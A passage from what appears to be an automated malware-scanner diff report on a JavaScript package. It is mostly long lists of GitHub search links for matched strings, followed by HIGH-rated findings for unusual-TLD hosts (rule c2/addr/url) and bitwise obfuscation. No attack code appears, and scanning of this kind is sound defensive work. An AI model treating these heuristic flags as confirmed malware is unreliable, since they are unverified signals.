[eBe(521)](https://github.com/search?q=eBe%28521%29&type=code)
[eBe(522)](https://github.com/search?q=eBe%28522%29&type=code)
[eBe(523)](https://github.com/search?q=eBe%28523%29&type=code)
[eBe(524)](https://github.com/search?q=eBe%28524%29&type=code)
[eBe(525)](https://github.com/search?q=eBe%28525%29&type=code)
[eBe(526)](https://github.com/search?q=eBe%28526%29&type=code)
[eBe(527)](https://github.com/search?q=eBe%28527%29&type=code)
[eBe(528)](https://github.com/search?q=eBe%28528%29&type=code)
[eBe(529)](https://github.com/search?q=eBe%28529%29&type=code)
[eBe(530)](https://github.com/search?q=eBe%28530%29&type=code)
[eBe(531)](https://github.com/search?q=eBe%28531%29&type=code)
[eBe(532)](https://github.com/search?q=eBe%28532%29&type=code)
[eBe(533)](https://github.com/search?q=eBe%28533%29&type=code)
[eBe(534)](https://github.com/search?q=eBe%28534%29&type=code)
[eBe(535)](https://github.com/search?q=eBe%28535%29&type=code)
[eBe(536)](https://github.com/search?q=eBe%28536%29&type=code)
[eBe(537)](https://github.com/search?q=eBe%28537%29&type=code)
[eBe(538)](https://github.com/search?q=eBe%28538%29&type=code)
[eBe(539)](https://github.com/search?q=eBe%28539%29&type=code)
[eBe(540)](https://github.com/search?q=eBe%28540%29&type=code)
[eBe(541)](https://github.com/search?q=eBe%28541%29&type=code)
[eBe(542)](https://github.com/search?q=eBe%28542%29&type=code)
[eBe(543)](https://github.com/search?q=eBe%28543%29&type=code)
[eBe(544)](https://github.com/search?q=eBe%28544%29&type=code)
[eBe(545)](https://github.com/search?q=eBe%28545%29&type=code)
[eBe(546)](https://github.com/search?q=eBe%28546%29&type=code)
[eBe(547)](https://github.com/search?q=eBe%28547%29&type=code)
[eBe(548)](https://github.com/search?q=eBe%28548%29&type=code)
[eBe(549)](https://github.com/search?q=eBe%28549%29&type=code)
[eBe(550)](https://github.com/search?q=eBe%28550%29&type=code)
[eBe(551)](https://github.com/search?q=eBe%28551%29&type=code)
[eBe(552)](https://github.com/search?q=eBe%28552%29&type=code)
[eBe(553)](https://github.com/search?q=eBe%28553%29&type=code)
[eBe(554)](https://github.com/search?q=eBe%28554%29&type=code)
[eBe(555)](https://github.com/search?q=eBe%28555%29&type=code)
[eBe(556)](https://github.com/search?q=eBe%28556%29&type=code)
[eBe(557)](https://github.com/search?q=eBe%28557%29&type=code)
[eBe(558)](https://github.com/search?q=eBe%28558%29&type=code)
[eBe(559)](https://github.com/search?q=eBe%28559%29&type=code)
[eBe(560)](https://github.com/search?q=eBe%28560%29&type=code)
[eBe(561)](https://github.com/search?q=eBe%28561%29&type=code)
[eBe(562)](https://github.com/search?q=eBe%28562%29&type=code)
[eBe(563)](https://github.com/search?q=eBe%28563%29&type=code)
[eBe(564)](https://github.com/search?q=eBe%28564%29&type=code)
[eBe(565)](https://github.com/search?q=eBe%28565%29&type=code)
[eBe(566)](https://github.com/search?q=eBe%28566%29&type=code)
[eBe(567)](https://github.com/search?q=eBe%28567%29&type=code)
[eBe(568)](https://github.com/search?q=eBe%28568%29&type=code)
[eBe(569)](https://github.com/search?q=eBe%28569%29&type=code)
[eBe(570)](https://github.com/search?q=eBe%28570%29&type=code)
[eBe(571)](https://github.com/search?q=eBe%28571%29&type=code)
[eBe(572)](https://github.com/search?q=eBe%28572%29&type=code)
[eBe(573)](https://github.com/search?q=eBe%28573%29&type=code)
[eBe(574)](https://github.com/search?q=eBe%28574%29&type=code)
[eBe(575)](https://github.com/search?q=eBe%28575%29&type=code)
[eBe(576)](https://github.com/search?q=eBe%28576%29&type=code)
[eBe(577)](https://github.com/search?q=eBe%28577%29&type=code)
[eBe(578)](https://github.com/search?q=eBe%28578%29&type=code)
[eBe(579)](https://github.com/search?q=eBe%28579%29&type=code)
[eBe(580)](https://github.com/search?q=eBe%28580%29&type=code)
[eBe(581)](https://github.com/search?q=eBe%28581%29&type=code)
[eBe(582)](https://github.com/search?q=eBe%28582%29&type=code)
[eBe(583)](https://github.com/search?q=eBe%28583%29&type=code)
[eBe(584)](https://github.com/search?q=eBe%28584%29&type=code)
[eBe(585)](https://github.com/search?q=eBe%28585%29&type=code)
[eBe(586)](https://github.com/search?q=eBe%28586%29&type=code)
[eBe(587)](https://github.com/search?q=eBe%28587%29&type=code)
[eBe(588)](https://github.com/search?q=eBe%28588%29&type=code)
[eBe(589)](https://github.com/search?q=eBe%28589%29&type=code)
[eBe(590)](https://github.com/search?q=eBe%28590%29&type=code)
[eBe(591)](https://github.com/search?q=eBe%28591%29&type=code)
[eBe(592)](https://github.com/search?q=eBe%28592%29&type=code)
[eBe(593)](https://github.com/search?q=eBe%28593%29&type=code)
[eBe(594)](https://github.com/search?q=eBe%28594%29&type=code)
[eBe(595)](https://github.com/search?q=eBe%28595%29&type=code)
[eBe(596)](https://github.com/search?q=eBe%28596%29&type=code)
[eBe(597)](https://github.com/search?q=eBe%28597%29&type=code)
[eBe(598)](https://github.com/search?q=eBe%28598%29&type=code)
[eBe(599)](https://github.com/search?q=eBe%28599%29&type=code)
[eBe(600)](https://github.com/search?q=eBe%28600%29&type=code)
[eBe(601)](https://github.com/search?q=eBe%28601%29&type=code)
[eBe(602)](https://github.com/search?q=eBe%28602%29&type=code)
[eBe(603)](https://github.com/search?q=eBe%28603%29&type=code)
[eBe(604)](https://github.com/search?q=eBe%28604%29&type=code)
[eBe(605)](https://github.com/search?q=eBe%28605%29&type=code)
[eBe(606)](https://github.com/search?q=eBe%28606%29&type=code)
[eBe(607)](https://github.com/search?q=eBe%28607%29&type=code)
[eBe(608)](https://github.com/search?q=eBe%28608%29&type=code)
[eBe(609)](https://github.com/search?q=eBe%28609%29&type=code)
[eBe(610)](https://github.com/search?q=eBe%28610%29&type=code)
[eBe(611)](https://github.com/search?q=eBe%28611%29&type=code)
[eBe(612)](https://github.com/search?q=eBe%28612%29&type=code)
[eBe(613)](https://github.com/search?q=eBe%28613%29&type=code)
[eBe(614)](https://github.com/search?q=eBe%28614%29&type=code)
[eBe(615)](https://github.com/search?q=eBe%28615%29&type=code)
[eBe(616)](https://github.com/search?q=eBe%28616%29&type=code)
[eBe(617)](https://github.com/search?q=eBe%28617%29&type=code)
[eBe(618)](https://github.com/search?q=eBe%28618%29&type=code)
[eBe(619)](https://github.com/search?q=eBe%28619%29&type=code)
[eBe(620)](https://github.com/search?q=eBe%28620%29&type=code)
[eBe(621)](https://github.com/search?q=eBe%28621%29&type=code)
[eBe(622)](https://github.com/search?q=eBe%28622%29&type=code)
[eBe(623)](https://github.com/search?q=eBe%28623%29&type=code)
[eBe(624)](https://github.com/search?q=eBe%28624%29&type=code)
[eBe(625)](https://github.com/search?q=eBe%28625%29&type=code)
[eBe(626)](https://github.com/search?q=eBe%28626%29&type=code)
[eBe(627)](https://github.com/search?q=eBe%28627%29&type=code)
[eBe(628)](https://github.com/search?q=eBe%28628%29&type=code)
[eBe(629)](https://github.com/search?q=eBe%28629%29&type=code)
[eBe(630)](https://github.com/search?q=eBe%28630%29&type=code)
[eBe(631)](https://github.com/search?q=eBe%28631%29&type=code)
[eBe(632)](https://github.com/search?q=eBe%28632%29&type=code)
[eBe(633)](https://github.com/search?q=eBe%28633%29&type=code)
[eBe(634)](https://github.com/search?q=eBe%28634%29&type=code)
[eBe(635)](https://github.com/search?q=eBe%28635%29&type=code)
[eBe(636)](https://github.com/search?q=eBe%28636%29&type=code)
[eBe(637)](https://github.com/search?q=eBe%28637%29&type=code)
[eBe(638)](https://github.com/search?q=eBe%28638%29&type=code)
[eBe(639)](https://github.com/search?q=eBe%28639%29&type=code)
[eBe(640)](https://github.com/search?q=eBe%28640%29&type=code)
[eBe(641)](https://github.com/search?q=eBe%28641%29&type=code)
[eBe(642)](https://github.com/search?q=eBe%28642%29&type=code)
[eBe(643)](https://github.com/search?q=eBe%28643%29&type=code)
[eBe(644)](https://github.com/search?q=eBe%28644%29&type=code)
[eBe(645)](https://github.com/search?q=eBe%28645%29&type=code)
[eBe(646)](https://github.com/search?q=eBe%28646%29&type=code)
[eBe(647)](https://github.com/search?q=eBe%28647%29&type=code)
[eBe(648)](https://github.com/search?q=eBe%28648%29&type=code)
[eBe(649)](https://github.com/search?q=eBe%28649%29&type=code)
[eBe(650)](https://github.com/search?q=eBe%28650%29&type=code)
[eBe(651)](https://github.com/search?q=eBe%28651%29&type=code)
[eBe(652)](https://github.com/search?q=eBe%28652%29&type=code)
[eBe(653)](https://github.com/search?q=eBe%28653%29&type=code)
[eBe(654)](https://github.com/search?q=eBe%28654%29&type=code)
[eBe(655)](https://github.com/search?q=eBe%28655%29&type=code)
[eBe(656)](https://github.com/search?q=eBe%28656%29&type=code)
[eBe(657)](https://github.com/search?q=eBe%28657%29&type=code)
[eBe(658)](https://github.com/search?q=eBe%28658%29&type=code)
[eBe(659)](https://github.com/search?q=eBe%28659%29&type=code)
[eBe(660)](https://github.com/search?q=eBe%28660%29&type=code)
[eBe(661)](https://github.com/search?q=eBe%28661%29&type=code)
[eBe(662)](https://github.com/search?q=eBe%28662%29&type=code)
[eBe(663)](https://github.com/search?q=eBe%28663%29&type=code)
[eBe(664)](https://github.com/search?q=eBe%28664%29&type=code)
[eBe(665)](https://github.com/search?q=eBe%28665%29&type=code)
[eBe(666)](https://github.com/search?q=eBe%28666%29&type=code)
[eBe(667)](https://github.com/search?q=eBe%28667%29&type=code)
[eBe(668)](https://github.com/search?q=eBe%28668%29&type=code)
[eBe(669)](https://github.com/search?q=eBe%28669%29&type=code)
[eBe(670)](https://github.com/search?q=eBe%28670%29&type=code)
[eBe(671)](https://github.com/search?q=eBe%28671%29&type=code)
[eBe(672)](https://github.com/search?q=eBe%28672%29&type=code)
[eBe(673)](https://github.com/search?q=eBe%28673%29&type=code)
[eBe(674)](https://github.com/search?q=eBe%28674%29&type=code)
[eBe(675)](https://github.com/search?q=eBe%28675%29&type=code)
[eBe(676)](https://github.com/search?q=eBe%28676%29&type=code)
[eBe(677)](https://github.com/search?q=eBe%28677%29&type=code)
[eBe(678)](https://github.com/search?q=eBe%28678%29&type=code)
[eBe(679)](https://github.com/search?q=eBe%28679%29&type=code)
[eBe(680)](https://github.com/search?q=eBe%28680%29&type=code)
[eBe(681)](https://github.com/search?q=eBe%28681%29&type=code)
[eBe(682)](https://github.com/search?q=eBe%28682%29&type=code)
[eBe(683)](https://github.com/search?q=eBe%28683%29&type=code)
[eBe(684)](https://github.com/search?q=eBe%28684%29&type=code)
[eBe(685)](https://github.com/search?q=eBe%28685%29&type=code)
[eBe(686)](https://github.com/search?q=eBe%28686%29&type=code)
[eBe(687)](https://github.com/search?q=eBe%28687%29&type=code)
[eBe(688)](https://github.com/search?q=eBe%28688%29&type=code)
[eBe(689)](https://github.com/search?q=eBe%28689%29&type=code)
[eBe(690)](https://github.com/search?q=eBe%28690%29&type=code)
[eBe(691)](https://github.com/search?q=eBe%28691%29&type=code)
[eBe(692)](https://github.com/search?q=eBe%28692%29&type=code)
[eBe(693)](https://github.com/search?q=eBe%28693%29&type=code)
[eBe(694)](https://github.com/search?q=eBe%28694%29&type=code)
[eBe(695)](https://github.com/search?q=eBe%28695%29&type=code)
[eBe(696)](https://github.com/search?q=eBe%28696%29&type=code)
[eBe(697)](https://github.com/search?q=eBe%28697%29&type=code)
[eBe(698)](https://github.com/search?q=eBe%28698%29&type=code)
[eBe(699)](https://github.com/search?q=eBe%28699%29&type=code)
[eBe(700)](https://github.com/search?q=eBe%28700%29&type=code)
[eBe(701)](https://github.com/search?q=eBe%28701%29&type=code)
[eBe(702)](https://github.com/search?q=eBe%28702%29&type=code)
[eBe(703)](https://github.com/search?q=eBe%28703%29&type=code)
[eBe(704)](https://github.com/search?q=eBe%28704%29&type=code)
[eBe(705)](https://github.com/search?q=eBe%28705%29&type=code)
[eBe(706)](https://github.com/search?q=eBe%28706%29&type=code)
[eBe(707)](https://github.com/search?q=eBe%28707%29&type=code)
[eBe(708)](https://github.com/search?q=eBe%28708%29&type=code)
[eBe(709)](https://github.com/search?q=eBe%28709%29&type=code)
[eBe(710)](https://github.com/search?q=eBe%28710%29&type=code)
[eBe(711)](https://github.com/search?q=eBe%28711%29&type=code)
[eBe(712)](https://github.com/search?q=eBe%28712%29&type=code)
[eBe(713)](https://github.com/search?q=eBe%28713%29&type=code)
[eBe(714)](https://github.com/search?q=eBe%28714%29&type=code)
[eBe(715)](https://github.com/search?q=eBe%28715%29&type=code)
[eBe(716)](https://github.com/search?q=eBe%28716%29&type=code)
[eBe(717)](https://github.com/search?q=eBe%28717%29&type=code)
[eBe(718)](https://github.com/search?q=eBe%28718%29&type=code)
[eBe(719)](https://github.com/search?q=eBe%28719%29&type=code)
[eBe(720)](https://github.com/search?q=eBe%28720%29&type=code)
[eBe(721)](https://github.com/search?q=eBe%28721%29&type=code)
[eBe(722)](https://github.com/search?q=eBe%28722%29&type=code)
[eBe(723)](https://github.com/search?q=eBe%28723%29&type=code)
[eBe(724)](https://github.com/search?q=eBe%28724%29&type=code)
[eBe(725)](https://github.com/search?q=eBe%28725%29&type=code)
[eBe(726)](https://github.com/search?q=eBe%28726%29&type=code)
[eBe(727)](https://github.com/search?q=eBe%28727%29&type=code)
[eBe(728)](https://github.com/search?q=eBe%28728%29&type=code)
[eBe(729)](https://github.com/search?q=eBe%28729%29&type=code)
[eBe(730)](https://github.com/search?q=eBe%28730%29&type=code)
[eBe(731)](https://github.com/search?q=eBe%28731%29&type=code)
[eBe(732)](https://github.com/search?q=eBe%28732%29&type=code)
[eBe(733)](https://github.com/search?q=eBe%28733%29&type=code)
[eBe(734)](https://github.com/search?q=eBe%28734%29&type=code)
[eBe(735)](https://github.com/search?q=eBe%28735%29&type=code)
[eBe(736)](https://github.com/search?q=eBe%28736%29&type=code)
[eBe(737)](https://github.com/search?q=eBe%28737%29&type=code)
[eBe(738)](https://github.com/search?q=eBe%28738%29&type=code)
[eBe(739)](https://github.com/search?q=eBe%28739%29&type=code)
[eBe(740)](https://github.com/search?q=eBe%28740%29&type=code)
[eBe(741)](https://github.com/search?q=eBe%28741%29&type=code)
[eBe(742)](https://github.com/search?q=eBe%28742%29&type=code)
[eBe(743)](https://github.com/search?q=eBe%28743%29&type=code)
[eBe(744)](https://github.com/search?q=eBe%28744%29&type=code)
[eBe(745)](https://github.com/search?q=eBe%28745%29&type=code)
[eBe(746)](https://github.com/search?q=eBe%28746%29&type=code)
[eBe(747)](https://github.com/search?q=eBe%28747%29&type=code)
[eBe(748)](https://github.com/search?q=eBe%28748%29&type=code)
[eBe(749)](https://github.com/search?q=eBe%28749%29&type=code)
[eBe(750)](https://github.com/search?q=eBe%28750%29&type=code)
[eBe(751)](https://github.com/search?q=eBe%28751%29&type=code)
[eBe(752)](https://github.com/search?q=eBe%28752%29&type=code)
[eBe(753)](https://github.com/search?q=eBe%28753%29&type=code)
[eBe(754)](https://github.com/search?q=eBe%28754%29&type=code)
[eBe(755)](https://github.com/search?q=eBe%28755%29&type=code)
[eBe(756)](https://github.com/search?q=eBe%28756%29&type=code)
[eBe(757)](https://github.com/search?q=eBe%28757%29&type=code)
[eBe(758)](https://github.com/search?q=eBe%28758%29&type=code)
[eBe(759)](https://github.com/search?q=eBe%28759%29&type=code)
[eBe(760)](https://github.com/search?q=eBe%28760%29&type=code)
[eBe(761)](https://github.com/search?q=eBe%28761%29&type=code)
[eBe(762)](https://github.com/search?q=eBe%28762%29&type=code)
[eBe(763)](https://github.com/search?q=eBe%28763%29&type=code)
[eBe(764)](https://github.com/search?q=eBe%28764%29&type=code)
[eBe(765)](https://github.com/search?q=eBe%28765%29&type=code)
[eBe(766)](https://github.com/search?q=eBe%28766%29&type=code)
[eBe(767)](https://github.com/search?q=eBe%28767%29&type=code)
[eBe(768)](https://github.com/search?q=eBe%28768%29&type=code)
[eBe(769)](https://github.com/search?q=eBe%28769%29&type=code)
[eBe(770)](https://github.com/search?q=eBe%28770%29&type=code)
[eBe(771)](https://github.com/search?q=eBe%28771%29&type=code)
[eBe(772)](https://github.com/search?q=eBe%28772%29&type=code)
[eBe(773)](https://github.com/search?q=eBe%28773%29&type=code)
[eBe(774)](https://github.com/search?q=eBe%28774%29&type=code)
[eBe(775)](https://github.com/search?q=eBe%28775%29&type=code)
[eBe(776)](https://github.com/search?q=eBe%28776%29&type=code)
[eBe(777)](https://github.com/search?q=eBe%28777%29&type=code)
[eBe(778)](https://github.com/search?q=eBe%28778%29&type=code)
[eBe(779)](https://github.com/search?q=eBe%28779%29&type=code)
[eBe(780)](https://github.com/search?q=eBe%28780%29&type=code)
[eBe(781)](https://github.com/search?q=eBe%28781%29&type=code)
[eBe(782)](https://github.com/search?q=eBe%28782%29&type=code)
[eBe(783)](https://github.com/search?q=eBe%28783%29&type=code)
[eBe(784)](https://github.com/search?q=eBe%28784%29&type=code)
[eBe(785)](https://github.com/search?q=eBe%28785%29&type=code)
[eBe(786)](https://github.com/search?q=eBe%28786%29&type=code)
[eBe(787)](https://github.com/search?q=eBe%28787%29&type=code)
[eBe(788)](https://github.com/search?q=eBe%28788%29&type=code)
[eBe(789)](https://github.com/search?q=eBe%28789%29&type=code)
[eBe(790)](https://github.com/search?q=eBe%28790%29&type=code)
[eBe(791)](https://github.com/search?q=eBe%28791%29&type=code)
[eBe(792)](https://github.com/search?q=eBe%28792%29&type=code)
[eBe(793)](https://github.com/search?q=eBe%28793%29&type=code)
[eBe(794)](https://github.com/search?q=eBe%28794%29&type=code)
[eBe(795)](https://github.com/search?q=eBe%28795%29&type=code)
[eBe(796)](https://github.com/search?q=eBe%28796%29&type=code)
[eBe(797)](https://github.com/search?q=eBe%28797%29&type=code)
[eBe(798)](https://github.com/search?q=eBe%28798%29&type=code)
[eBe(799)](https://github.com/search?q=eBe%28799%29&type=code)
[eBe(800)](https://github.com/search?q=eBe%28800%29&type=code)
[eBe(801)](https://github.com/search?q=eBe%28801%29&type=code)
[eBe(802)](https://github.com/search?q=eBe%28802%29&type=code)
[eBe(803)](https://github.com/search?q=eBe%28803%29&type=code)
[eBe(804)](https://github.com/search?q=eBe%28804%29&type=code)
[eBe(805)](https://github.com/search?q=eBe%28805%29&type=code)
[eBe(806)](https://github.com/search?q=eBe%28806%29&type=code)
[eBe(807)](https://github.com/search?q=eBe%28807%29&type=code)
[eBe(808)](https://github.com/search?q=eBe%28808%29&type=code)
[eBe(809)](https://github.com/search?q=eBe%28809%29&type=code)
[eBe(810)](https://github.com/search?q=eBe%28810%29&type=code)
[eBe(811)](https://github.com/search?q=eBe%28811%29&type=code)
[eBe(812)](https://github.com/search?q=eBe%28812%29&type=code)
[eBe(813)](https://github.com/search?q=eBe%28813%29&type=code)
[eBe(814)](https://github.com/search?q=eBe%28814%29&type=code)
[eBe(815)](https://github.com/search?q=eBe%28815%29&type=code)
[eBe(816)](https://github.com/search?q=eBe%28816%29&type=code)
[eBe(817)](https://github.com/search?q=eBe%28817%29&type=code)
[eBe(818)](https://github.com/search?q=eBe%28818%29&type=code)
[eBe(819)](https://github.com/search?q=eBe%28819%29&type=code)
[eBe(820)](https://github.com/search?q=eBe%28820%29&type=code)
[eBe(821)](https://github.com/search?q=eBe%28821%29&type=code)
[eBe(822)](https://github.com/search?q=eBe%28822%29&type=code)
[eBe(823)](https://github.com/search?q=eBe%28823%29&type=code)
[eBe(824)](https://github.com/search?q=eBe%28824%29&type=code)
[eBe(825)](https://github.com/search?q=eBe%28825%29&type=code)
[eBe(826)](https://github.com/search?q=eBe%28826%29&type=code)
[eBe(827)](https://github.com/search?q=eBe%28827%29&type=code)
[eBe(828)](https://github.com/search?q=eBe%28828%29&type=code)
[eBe(829)](https://github.com/search?q=eBe%28829%29&type=code)
[eBe(-1)](https://github.com/search?q=eBe%28-1%29&type=code)
[eBe(-2)](https://github.com/search?q=eBe%28-2%29&type=code)
[eBe(-3)](https://github.com/search?q=eBe%28-3%29&type=code)
[eBe(-4)](https://github.com/search?q=eBe%28-4%29&type=code)
[eBe(-5)](https://github.com/search?q=eBe%28-5%29&type=code)
[eBe(-6)](https://github.com/search?q=eBe%28-6%29&type=code)
[eBe(-7)](https://github.com/search?q=eBe%28-7%29&type=code)
[eBe(-8)](https://github.com/search?q=eBe%28-8%29&type=code)
[eBe(-9)](https://github.com/search?q=eBe%28-9%29&type=code)
[eBe(10)](https://github.com/search?q=eBe%2810%29&type=code)
[eBe(11)](https://github.com/search?q=eBe%2811%29&type=code)
[eBe(12)](https://github.com/search?q=eBe%2812%29&type=code)
[eBe(13)](https://github.com/search?q=eBe%2813%29&type=code)
[eBe(14)](https://github.com/search?q=eBe%2814%29&type=code)
[eBe(15)](https://github.com/search?q=eBe%2815%29&type=code)
[eBe(16)](https://github.com/search?q=eBe%2816%29&type=code)
[eBe(17)](https://github.com/search?q=eBe%2817%29&type=code)
[eBe(18)](https://github.com/search?q=eBe%2818%29&type=code)
[eBe(19)](https://github.com/search?q=eBe%2819%29&type=code)
[eBe(20)](https://github.com/search?q=eBe%2820%29&type=code)
[eBe(21)](https://github.com/search?q=eBe%2821%29&type=code)
[eBe(22)](https://github.com/search?q=eBe%2822%29&type=code)
[eBe(23)](https://github.com/search?q=eBe%2823%29&type=code)
[eBe(24)](https://github.com/search?q=eBe%2824%29&type=code)
[eBe(25)](https://github.com/search?q=eBe%2825%29&type=code)
[eBe(26)](https://github.com/search?q=eBe%2826%29&type=code)
[eBe(27)](https://github.com/search?q=eBe%2827%29&type=code)
[eBe(28)](https://github.com/search?q=eBe%2828%29&type=code)
[eBe(29)](https://github.com/search?q=eBe%2829%29&type=code)
[eBe(30)](https://github.com/search?q=eBe%2830%29&type=code)
[eBe(31)](https://github.com/search?q=eBe%2831%29&type=code)
[eBe(32)](https://github.com/search?q=eBe%2832%29&type=code)
[eBe(33)](https://github.com/search?q=eBe%2833%29&type=code)
[eBe(34)](https://github.com/search?q=eBe%2834%29&type=code)
[eBe(35)](https://github.com/search?q=eBe%2835%29&type=code)
[eBe(36)](https://github.com/search?q=eBe%2836%29&type=code)
[eBe(37)](https://github.com/search?q=eBe%2837%29&type=code)
[eBe(38)](https://github.com/search?q=eBe%2838%29&type=code)
[eBe(39)](https://github.com/search?q=eBe%2839%29&type=code)
[eBe(40)](https://github.com/search?q=eBe%2840%29&type=code)
[eBe(41)](https://github.com/search?q=eBe%2841%29&type=code)
[eBe(42)](https://github.com/search?q=eBe%2842%29&type=code)
[eBe(43)](https://github.com/search?q=eBe%2843%29&type=code)
[eBe(44)](https://github.com/search?q=eBe%2844%29&type=code)
[eBe(45)](https://github.com/search?q=eBe%2845%29&type=code)
[eBe(46)](https://github.com/search?q=eBe%2846%29&type=code)
[eBe(47)](https://github.com/search?q=eBe%2847%29&type=code)
[eBe(48)](https://github.com/search?q=eBe%2848%29&type=code)
[eBe(49)](https://github.com/search?q=eBe%2849%29&type=code)
[eBe(50)](https://github.com/search?q=eBe%2850%29&type=code)
[eBe(51)](https://github.com/search?q=eBe%2851%29&type=code)
[eBe(52)](https://github.com/search?q=eBe%2852%29&type=code)
[eBe(53)](https://github.com/search?q=eBe%2853%29&type=code)
[eBe(54)](https://github.com/search?q=eBe%2854%29&type=code)
[eBe(55)](https://github.com/search?q=eBe%2855%29&type=code)
[eBe(56)](https://github.com/search?q=eBe%2856%29&type=code)
[eBe(57)](https://github.com/search?q=eBe%2857%29&type=code)
[eBe(58)](https://github.com/search?q=eBe%2858%29&type=code)
[eBe(59)](https://github.com/search?q=eBe%2859%29&type=code)
[eBe(60)](https://github.com/search?q=eBe%2860%29&type=code)
[eBe(61)](https://github.com/search?q=eBe%2861%29&type=code)
[eBe(62)](https://github.com/search?q=eBe%2862%29&type=code)
[eBe(63)](https://github.com/search?q=eBe%2863%29&type=code)
[eBe(64)](https://github.com/search?q=eBe%2864%29&type=code)
[eBe(65)](https://github.com/search?q=eBe%2865%29&type=code)
[eBe(66)](https://github.com/search?q=eBe%2866%29&type=code)
[eBe(67)](https://github.com/search?q=eBe%2867%29&type=code)
[eBe(68)](https://github.com/search?q=eBe%2868%29&type=code)
[eBe(69)](https://github.com/search?q=eBe%2869%29&type=code)
[eBe(70)](https://github.com/search?q=eBe%2870%29&type=code)
[eBe(71)](https://github.com/search?q=eBe%2871%29&type=code)
[eBe(72)](https://github.com/search?q=eBe%2872%29&type=code)
[eBe(73)](https://github.com/search?q=eBe%2873%29&type=code)
[eBe(74)](https://github.com/search?q=eBe%2874%29&type=code)
[eBe(75)](https://github.com/search?q=eBe%2875%29&type=code)
[eBe(76)](https://github.com/search?q=eBe%2876%29&type=code)
[eBe(77)](https://github.com/search?q=eBe%2877%29&type=code)
[eBe(78)](https://github.com/search?q=eBe%2878%29&type=code)
[eBe(79)](https://github.com/search?q=eBe%2879%29&type=code)
[eBe(80)](https://github.com/search?q=eBe%2880%29&type=code)
[eBe(81)](https://github.com/search?q=eBe%2881%29&type=code)
[eBe(82)](https://github.com/search?q=eBe%2882%29&type=code)
[eBe(83)](https://github.com/search?q=eBe%2883%29&type=code)
[eBe(84)](https://github.com/search?q=eBe%2884%29&type=code)
[eBe(85)](https://github.com/search?q=eBe%2885%29&type=code)
[eBe(86)](https://github.com/search?q=eBe%2886%29&type=code)
[eBe(87)](https://github.com/search?q=eBe%2887%29&type=code)
[eBe(88)](https://github.com/search?q=eBe%2888%29&type=code)
[eBe(89)](https://github.com/search?q=eBe%2889%29&type=code)
[eBe(90)](https://github.com/search?q=eBe%2890%29&type=code)
[eBe(91)](https://github.com/search?q=eBe%2891%29&type=code)
[eBe(92)](https://github.com/search?q=eBe%2892%29&type=code)
[eBe(93)](https://github.com/search?q=eBe%2893%29&type=code)
[eBe(94)](https://github.com/search?q=eBe%2894%29&type=code)
[eBe(95)](https://github.com/search?q=eBe%2895%29&type=code)
[eBe(96)](https://github.com/search?q=eBe%2896%29&type=code)
[eBe(97)](https://github.com/search?q=eBe%2897%29&type=code)
[eBe(98)](https://github.com/search?q=eBe%2898%29&type=code)
[eBe(99)](https://github.com/search?q=eBe%2899%29&type=code)
[eBe(0)](https://github.com/search?q=eBe%280%29&type=code)
[eBe(1)](https://github.com/search?q=eBe%281%29&type=code)
[eBe(2)](https://github.com/search?q=eBe%282%29&type=code)
[eBe(3)](https://github.com/search?q=eBe%283%29&type=code)
[eBe(4)](https://github.com/search?q=eBe%284%29&type=code)
[eBe(5)](https://github.com/search?q=eBe%285%29&type=code)
[eBe(6)](https://github.com/search?q=eBe%286%29&type=code)
[eBe(7)](https://github.com/search?q=eBe%287%29&type=code)
[eBe(8)](https://github.com/search?q=eBe%288%29&type=code)
[eBe(9)](https://github.com/search?q=eBe%289%29&type=code) | -| +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://openchain.xyz/](https://openchain.xyz/) | +| +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function\(](https://github.com/search?q=function%28&type=code)
[charAt\(a](https://github.com/search?q=charAt%28a&type=code)
[charAt\(c](https://github.com/search?q=charAt%28c&type=code)
[charAt\(n](https://github.com/search?q=charAt%28n&type=code)
[charAt\(s](https://github.com/search?q=charAt%28s&type=code)
[charAt\(t](https://github.com/search?q=charAt%28t&type=code)
[charAt\(u](https://github.com/search?q=charAt%28u&type=code)
[charAt\(w](https://github.com/search?q=charAt%28w&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
